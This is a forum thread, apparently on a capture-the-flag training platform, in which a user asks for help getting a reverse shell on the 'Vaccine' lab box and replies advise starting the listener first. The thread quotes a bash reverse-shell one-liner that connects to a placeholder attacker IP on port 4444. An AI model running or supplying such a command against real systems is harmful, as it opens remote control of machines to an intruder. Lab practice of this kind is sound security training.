Starting-point-Vaccine reverse_shel

Hi Hackers!
iam having trouble in getting reverse shell

got a question where should i type “bash -c ‘bash -i >& /dev/tcp/<your_ip>/4444 0>&1’” command i tried on os-shell and before that i changed my ip section with my vpn ip and then i started listener on port 4444

still iam unable to get reverse shell

h31p m3!!

Thanks in advance !!!

Type your comment> @106Sam said:

Hi Hackers!

got a question where should i type “bash -c ‘bash -i >& /dev/tcp/<your_ip>/4444 0>&1’” command i tried on os-shell and before that i changed my ip section with my vpn ip and then i started listener on port 4444

h31p m3!!

Thanks in advance !!!

This seems too simple, but you gotta start listener before running the dev/tcp command. But don’t worry you’ll run into more problems :persevere:

edit: nvm, there was a typo is the code I used to get the reverse shell. Got the box xD.

Type your comment> @r0vi said:

Type your comment> @106Sam said:

Hi Hackers!

h31p m3!!

Thanks in advance !!!

This seems too simple, but you gotta start listener before running the dev/tcp command. But don’t worry you’ll run into more problems :persevere:

thanks i figured it out and got the flag…really thanks you soo much for replying…and really i run into more and more problems everytime